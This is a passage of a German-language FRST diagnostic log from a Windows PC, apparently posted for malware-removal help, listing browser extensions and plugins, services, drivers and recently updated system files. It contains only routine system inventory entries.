{DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\jp2ssv.dll [2017-08-06] (Oracle Corporation) Edge: ====== Edge HomeButtonPage: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001 -> hxxps://www.google.ch/ FireFox: ======== FF ProfilePath: C:\Users\***\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default [2017-08-09] FF Extension: (Avira Browser Safety) - 
C:\Users\***\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default\Extensions\abs@avira.com [2017-08-01] FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt FF Extension: (Logitech SetPoint) - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2016-08-08] [ist nicht signiert] FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.56 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2014-09-03] (Intel Corporation) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2014-09-03] (Intel Corporation) FF Plugin-x32: @java.com/DTPlugin,version=11.144.2 -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\dtplugin\npDeployJava1.dll [2017-08-06] (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=11.144.2 -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\plugin2\npjp2.dll [2017-08-06] (Oracle Corporation) FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2017-07-19] (NVIDIA Corporation) FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2017-07-19] (NVIDIA Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-08-01] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-08-01] (Google Inc.) 
FF Plugin-x32: @videolan.org/vlc,version=2.2.0 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei] FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei] FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: @tools.google.com/Google Update;version=3 -> C:\Users\***\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.) FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: @tools.google.com/Google Update;version=9 -> C:\Users\***\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.) FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: SkypePlugin -> C:\Users\***\AppData\Local\SkypePlugin\7.29.0.73\npGatewayNpapi.dll [2016-12-08] (Skype Technologies S.A.) FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: SkypePlugin64 -> C:\Users\***\AppData\Local\SkypePlugin\7.29.0.73\npGatewayNpapi-x64.dll [2016-12-08] (Skype Technologies S.A.) Chrome: ======= CHR HomePage: Default -> msn.com CHR StartupUrls: Default -> "hxxps://www.google.ch/" CHR DefaultSearchURL: Default -> hxxp://www.bing.com/search?FORM=__PARAM__DF&PC=__PARAM__&q={searchTerms} CHR DefaultSearchKeyword: Default -> bing.com CHR DefaultSuggestURL: Default -> hxxp://www.bing.com/osjson.aspx?FORM=__PARAM__DF&PC=__PARAM__&query={searchTerms} CHR Profile: C:\Users\***\AppData\Local\Google\Chrome\User Data\Default [2017-08-09] CHR Extension: (Google*Übersetzer) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb [2017-08-01] CHR Extension: (Google Präsentationen) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-08-01] CHR Extension: (Google Docs) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-08-01] CHR Extension: (Google Drive) - C:\Users\***\AppData\Local\Google\Chrome\User 
Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-08-01] CHR Extension: (YouTube) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-08-01] CHR Extension: (Google Tabellen) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-08-01] CHR Extension: (Google Docs Offline) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-08-01] CHR Extension: (Testen Sie Ihre Internet-Geschwindigkeit) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\hekhmbhledgahgpondpnaeaffoipehch [2017-08-01] CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-01] CHR Extension: (Deutsch Übersetzer) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\ohiojbnhbaoegegaajagfiekffejejih [2017-08-01] CHR Extension: (YouTube™ Flash-HTML5) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\omimccinlhlkpjaeaocglgmkbelejlhj [2017-08-01] CHR Extension: (Google Mail) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-08-01] CHR Extension: (Chrome Media Router) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-08-01] CHR Extension: (Skype-Anrufe) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\poghlonenmjdkfghdpfomojhhfggildk [2017-08-01] CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd] - hxxps://clients2.google.com/service/update2/crx ==================== Dienste (Nicht auf der Ausnahmeliste) 
==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [305664 2014-08-11] (Qualcomm Atheros) [Datei ist nicht signiert] S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [1465352 2017-01-15] () S3 GalaxyClientService; C:\Program Files (x86)\GalaxyClient\GalaxyClientService.exe [487488 2017-07-31] (GOG.com) S3 GalaxyCommunication; C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe [8163392 2017-07-15] (GOG.com) S3 HiPatchService; G:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [9728 2017-07-12] (Hi-Rez Studios) [Datei ist nicht signiert] R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [16232 2014-05-28] (Intel Corporation) S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [887256 2014-05-13] (Intel(R) Corporation) R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [131544 2014-09-03] (Intel Corporation) S3 iumsvc; C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe [178312 2015-09-26] (Intel Corporation) S3 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [154584 2014-09-03] (Intel Corporation) R2 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [225400 2017-04-06] (Logitech Inc.) 
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [512960 2017-07-26] (NVIDIA Corporation) S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [512960 2017-07-26] (NVIDIA Corporation) R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [462968 2017-07-19] (NVIDIA Corporation) R2 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [449984 2017-07-26] (NVIDIA Corporation) S3 Origin Client Service; G:\Program Files (x86)\Origin\OriginClientService.exe [2169696 2017-07-11] (Electronic Arts) R2 Origin Web Helper Service; G:\Program Files (x86)\Origin\OriginWebHelperService.exe [3149672 2017-07-11] (Electronic Arts) R2 PDF24; C:\Program Files (x86)\PDF24\pdf24.exe [217736 2017-02-23] (Geek Software GmbH) R2 Qualcomm Atheros Killer Service V2; C:\Program Files\Qualcomm Atheros\Network Manager\KillerService.exe [387584 2014-09-19] (Qualcomm Atheros) [Datei ist nicht signiert] R2 SMService; C:\Program Files (x86)\IObit\Classic Start\SMService.exe [1066272 2016-11-15] (IObit) R2 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.) R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation) R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-06-20] (Microsoft Corporation) S2 DigitalWave.Update.Service; "C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\app_updater.exe" [X] ===================== Treiber (Nicht auf der Ausnahmeliste) ====================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) R3 AVerPL33_x64; C:\WINDOWS\system32\DRIVERS\AVerPL33_x64.sys [1780992 2014-07-16] (AVerMedia TECHNOLOGIES, Inc.) 
S3 bcmsmbsp; C:\WINDOWS\System32\drivers\bcmsmbsp.sys [41176 2015-08-22] (Broadcom Corporation.) S1 BfLwf; C:\WINDOWS\system32\DRIVERS\bwcW8x64.sys [97968 2014-09-11] (Qualcomm Atheros, Inc.) S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [130688 2016-07-22] (Samsung Electronics Co., Ltd.) R3 ETDSMBus; C:\WINDOWS\System32\drivers\ETDSMBus.sys [32840 2017-07-16] (ELAN Microelectronic Corp.) R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [26528 2015-03-15] (REALiX(tm)) S3 Ke2200; C:\WINDOWS\System32\drivers\e22w8x64.sys [130224 2014-03-27] (Qualcomm Atheros, Inc.) R3 KillerEth; C:\WINDOWS\System32\drivers\e2xw10x64.sys [145920 2017-03-18] (Qualcomm Atheros, Inc.) R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-21] (Logitech) R3 LGJoyXlCore; C:\WINDOWS\system32\drivers\LGJoyXlCore.sys [67736 2017-01-24] (Logitech Inc.) R1 MpKsl174ac0cd; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{1930F23C-426D-4967-B2BF-B8BF84D915B1}\MpKsl174ac0cd.sys [44928 2017-08-08] (Microsoft Corporation) R1 MpKsla84e905b; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{A7D2BD46-1D78-4F16-85FF-98FC90F0D75A}\MpKsla84e905b.sys [44928 2017-08-09] (Microsoft Corporation) R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_24ddebfb518b5a55\nvlddmkm.sys [15668664 2017-07-19] (NVIDIA Corporation) S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30144 2017-07-26] (NVIDIA Corporation) R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [48064 2017-07-26] (NVIDIA Corporation) R3 nvvhci; C:\WINDOWS\System32\drivers\nvvhci.sys [57792 2017-07-19] (NVIDIA Corporation) R3 SaiMini; C:\WINDOWS\System32\drivers\SaiMini.sys [23968 2016-08-06] (Saitek) R3 SaiNtBus; C:\WINDOWS\system32\drivers\SaiBus.sys [51488 2016-08-06] (Saitek) S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] () S3 ssudmdm; 
C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [164992 2016-07-22] (Samsung Electronics Co., Ltd.) S3 USBADVAU; C:\WINDOWS\system32\drivers\cm11264.sys [4135936 2013-11-01] (C-Media Electronics Inc) [Datei ist nicht signiert] S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation) R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation) R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation) ==================== NetSvcs (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) ==================== Ein Monat: Erstellte Dateien und Ordner ======== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 2017-08-09 18:58 - 2017-08-09 18:58 - 002381824 _____ (Farbar) C:\Users\***\Desktop\FRST64.exe 2017-08-09 18:58 - 2017-08-09 18:58 - 000000000 ____D C:\Users\***\Desktop\FRST-OlderVersion 2017-08-09 18:40 - 2017-08-09 18:55 - 000000000 ____D C:\WINDOWS\Minidump 2017-08-08 23:04 - 2017-08-08 23:04 - 000000000 ____D C:\Users\***\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox 2017-08-08 19:26 - 2017-08-01 04:39 - 008319392 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe 2017-08-08 19:26 - 2017-08-01 04:38 - 000406544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\policymanager.dll 2017-08-08 19:26 - 2017-08-01 04:38 - 000382368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys 2017-08-08 19:26 - 2017-08-01 04:36 - 002165752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll 2017-08-08 19:26 - 2017-08-01 04:36 - 000750496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe 2017-08-08 19:26 - 2017-08-01 04:36 - 000119712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tdx.sys 2017-08-08 19:26 - 
2017-08-01 04:35 - 000280472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WerFault.exe 2017-08-08 19:26 - 2017-08-01 04:35 - 000133904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WerFaultSecure.exe 2017-08-08 19:26 - 2017-08-01 04:34 - 000610584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll 2017-08-08 19:26 - 2017-08-01 04:34 - 000359552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Faultrep.dll 2017-08-08 19:26 - 2017-08-01 04:34 - 000349600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll 2017-08-08 19:26 - 2017-08-01 04:34 - 000168864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe 2017-08-08 19:26 - 2017-08-01 04:33 - 000473240 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanager.dll 2017-08-08 19:26 - 2017-08-01 04:32 - 002444704 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys 2017-08-08 19:26 - 2017-08-01 04:32 - 000820128 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe 2017-08-08 19:26 - 2017-08-01 04:32 - 000712600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys 2017-08-08 19:26 - 2017-08-01 04:31 - 005477088 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll 2017-08-08 19:26 - 2017-08-01 04:31 - 002645680 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll 2017-08-08 19:26 - 2017-08-01 04:31 - 000212384 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll 2017-08-08 19:26 - 2017-08-01 04:31 - 000176024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\basecsp.dll 2017-08-08 19:26 - 2017-08-01 04:30 - 000723680 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll 2017-08-08 19:26 - 2017-08-01 04:30 - 000411040 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll 2017-08-08 19:26 - 2017-08-01 04:30 - 000410160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Faultrep.dll 2017-08-08 19:26 - 2017-08-01 04:30 - 000315288 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\WerFault.exe 2017-08-08 19:26 - 2017-08-01 04:30 - 000182688 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe 2017-08-08 19:26 - 2017-08-01 04:30 - 000143736 _____ (Microsoft Corporation) C:\WINDOWS\system32\WerFaultSecure.exe 2017-08-08 19:26 - 2017-08-01 04:30 - 000082336 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vmbkmcl.sys 2017-08-08 19:26 - 2017-08-01 04:26 - 000204192 _____ (Microsoft Corporation) C:\WINDOWS\system32\basecsp.dll 2017-08-08 19:26 - 2017-08-01 04:20 - 002956288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys 2017-08-08 19:26 - 2017-08-01 04:20 - 000404480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werui.dll 2017-08-08 19:26 - 2017-08-01 04:20 - 000154624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWWIN.EXE 2017-08-08 19:26 - 2017-08-01 04:18 - 013841408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll 2017-08-08 19:26 - 2017-08-01 04:18 - 002199552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll 2017-08-08 19:26 - 2017-08-01 04:17 - 000034816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tokenbinding.dll 2017-08-08 19:26 - 2017-08-01 04:16 - 000080896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll 2017-08-08 19:26 - 2017-08-01 04:14 - 000035840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sscore.dll 2017-08-08 19:26 - 2017-08-01 04:13 - 020504064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll 2017-08-08 19:26 - 2017-08-01 04:13 - 000364032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll 2017-08-08 19:26 - 2017-08-01 04:13 - 000127488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fdeploy.dll 2017-08-08 19:26 - 2017-08-01 04:12 - 019336192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll 2017-08-08 19:26 - 2017-08-01 04:12 - 000229888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scksp.dll 2017-08-08 19:26 - 2017-08-01 04:10 - 000358400 _____ 
(Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll 2017-08-08 19:26 - 2017-08-01 04:09 - 000394240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll 2017-08-08 19:26 - 2017-08-01 04:08 - 000267264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ncryptprov.dll 2017-08-08 19:26 - 2017-08-01 04:07 - 011870208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll 2017-08-08 19:26 - 2017-08-01 04:07 - 005961728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll 2017-08-08 19:26 - 2017-08-01 04:07 - 002671616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll 2017-08-08 19:26 - 2017-08-01 04:06 - 000798208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll 2017-08-08 19:26 - 2017-08-01 04:04 - 006269440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll 2017-08-08 19:26 - 2017-08-01 04:04 - 003656192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll 2017-08-08 19:26 - 2017-08-01 04:03 - 001627136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll 2017-08-08 19:26 - 2017-08-01 03:57 - 023677952 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll 2017-08-08 19:26 - 2017-08-01 03:45 - 003670016 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys 2017-08-08 19:26 - 2017-08-01 03:45 - 001275392 _____ (Microsoft Corporation) C:\WINDOWS\system32\werconcpl.dll 2017-08-08 19:26 - 2017-08-01 03:45 - 000462848 _____ (Microsoft Corporation) C:\WINDOWS\system32\werui.dll 2017-08-08 19:26 - 2017-08-01 03:45 - 000092672 _____ (Microsoft Corporation) C:\WINDOWS\system32\wercplsupport.dll 2017-08-08 19:26 - 2017-08-01 03:44 - 000184320 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWWIN.EXE 2017-08-08 19:26 - 2017-08-01 03:44 - 000083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vmbkmclr.sys 2017-08-08 19:26 - 2017-08-01 03:44 - 000077824 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsqmcons.exe 2017-08-08 19:26 - 
2017-08-01 03:42 - 002199552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll 2017-08-08 19:26 - 2017-08-01 03:41 - 000130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanagerprecheck.dll 2017-08-08 19:26 - 2017-08-01 03:41 - 000110592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll 2017-08-08 19:26 - 2017-08-01 03:41 - 000042496 _____ (Microsoft Corporation) C:\WINDOWS\system32\tokenbinding.dll 2017-08-08 19:26 - 2017-08-01 03:40 - 017366528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll 2017-08-08 19:26 - 2017-08-01 03:40 - 000290816 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenterprisediagnostics.dll 2017-08-08 19:26 - 2017-08-01 03:39 - 000046592 _____ (Microsoft Corporation) C:\WINDOWS\system32\sscore.dll 2017-08-08 19:26 - 2017-08-01 03:38 - 000153088 _____ (Microsoft Corporation) C:\WINDOWS\system32\fdeploy.dll 2017-08-08 19:26 - 2017-08-01 03:38 - 000143872 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvcext.dll 2017-08-08 19:26 - 2017-08-01 03:37 - 000582656 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmsRouterSvc.dll 2017-08-08 19:26 - 2017-08-01 03:37 - 000433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll 2017-08-08 19:26 - 2017-08-01 03:37 - 000255488 _____ (Microsoft Corporation) C:\WINDOWS\system32\scksp.dll 2017-08-08 19:26 - 2017-08-01 03:36 - 023681536 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll 2017-08-08 19:26 - 2017-08-01 03:35 - 000692736 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll 2017-08-08 19:26 - 2017-08-01 03:34 - 000805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll 2017-08-08 19:26 - 2017-08-01 03:33 - 001269760 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll 2017-08-08 19:26 - 2017-08-01 03:33 - 000315904 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncryptprov.dll 2017-08-08 19:26 - 2017-08-01 03:32 - 007336960 _____ (Microsoft 
Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll 2017-08-08 19:26 - 2017-08-01 03:32 - 000176640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wersvc.dll 2017-08-08 19:26 - 2017-08-01 03:31 - 012786176 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll 2017-08-08 19:26 - 2017-08-01 03:31 - 004445696 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll 2017-08-08 19:26 - 2017-08-01 03:31 - 001396736 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll 2017-08-08 19:26 - 2017-08-01 03:30 - 008209920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll 2017-08-08 19:26 - 2017-08-01 03:30 - 003377664 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll 2017-08-08 19:26 - 2017-08-01 03:30 - 002055168 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys 2017-08-08 19:26 - 2017-08-01 03:30 - 001052160 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll 2017-08-08 19:26 - 2017-08-01 03:30 - 000303104 _____ (Microsoft Corporation) C:\WINDOWS\system32\srvsvc.dll 2017-08-08 19:26 - 2017-08-01 03:28 - 004730368 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll 2017-08-08 19:26 - 2017-08-01 03:28 - 002516480 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll 2017-08-08 19:26 - 2017-08-01 03:27 - 001802752 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll 2017-08-08 19:26 - 2017-08-01 03:27 - 000574464 _____ (Microsoft Corporation) C:\WINDOWS\system32\configmanager2.dll 2017-08-08 19:26 - 2017-08-01 03:27 - 000482816 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenrollengine.dll 2017-08-08 19:26 - 2017-08-01 03:26 - 000323584 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceEnroller.exe 2017-08-08 19:26 - 2017-08-01 03:25 - 000249344 _____ (Microsoft Corporation) C:\WINDOWS\system32\coredpus.dll 2017-08-08 19:26 - 2017-08-01 03:25 - 000194048 _____ (Microsoft Corporation) C:\WINDOWS\system32\mdmregistration.dll 2017-08-08 19:26 - 
2017-08-01 03:25 - 000140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcsps.dll 2017-08-08 19:26 - 2017-08-01 00:45 - 001311744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjet40.dll 2017-08-08 19:26 - 2017-08-01 00:45 - 000866816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mswdat10.dll 2017-08-08 19:26 - 2017-08-01 00:45 - 000641536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mswstr10.dll 2017-08-08 19:26 - 2017-08-01 00:45 - 000616448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrepl40.dll 2017-08-08 19:26 - 2017-08-01 00:45 - 000518144 _____ C:\WINDOWS\SysWOW64\msjetoledb40.dll 2017-08-08 19:26 - 2017-08-01 00:45 - 000475648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxbde40.dll 2017-08-08 19:26 - 2017-08-01 00:45 - 000375808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspbde40.dll 2017-08-08 19:26 - 2017-08-01 00:45 - 000343552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd3x40.dll 2017-08-08 19:26 - 2017-08-01 00:45 - 000339968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msexcl40.dll 2017-08-08 19:26 - 2017-08-01 00:45 - 000310272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd2x40.dll 2017-08-08 19:26 - 2017-08-01 00:45 - 000290816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjtes40.dll 2017-08-08 19:26 - 2017-08-01 00:45 - 000272896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstext40.dll 2017-08-08 19:26 - 2017-08-01 00:45 - 000240640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msltus40.dll 2017-08-08 19:26 - 2017-08-01 00:45 - 000144896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjint40.dll 2017-08-08 19:26 - 2017-08-01 00:45 - 000083968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjter40.dll 2017-08-08 19:26 - 2017-07-31 17:15 - 000835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe 2017-08-08 19:26 - 2017-07-31 17:15 - 000177648 _____ (Adobe 